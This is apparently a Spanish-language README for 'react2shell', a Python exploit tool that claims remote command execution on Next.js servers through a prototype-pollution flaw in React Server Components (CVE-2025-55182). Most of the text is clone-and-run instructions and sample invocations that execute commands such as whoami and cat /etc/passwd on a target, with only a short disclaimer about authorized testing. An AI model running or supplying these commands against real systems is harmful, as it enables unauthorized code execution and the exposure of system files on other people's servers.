
Una herramienta de explotación para la vulnerabilidad CVE-2025-55182 de Next.js que permite la ejecución remota de comandos a través de un envenenamiento de prototipo en React Server Components.
Exploit en Python para la vulnerabilidad RCE de los componentes del servidor React de Next.js con soporte HTTP/HTTPS.
# Clone & run
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<command>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
Solo para pruebas de seguridad autorizadas.
Úselo solo en sistemas que posea o tenga permiso explícito para probar. Nunca lo use para actividades ilegales.
child_process.execSync()Licencia MIT - consulte el archivo LICENSE
Descargo de responsabilidad: Solo con fines educativos. Siempre obtenga la autorización adecuada.
Última actualización: 8 de febrero de 2025
Versión: 2.0.0
Mantenedor: BrianLopezM99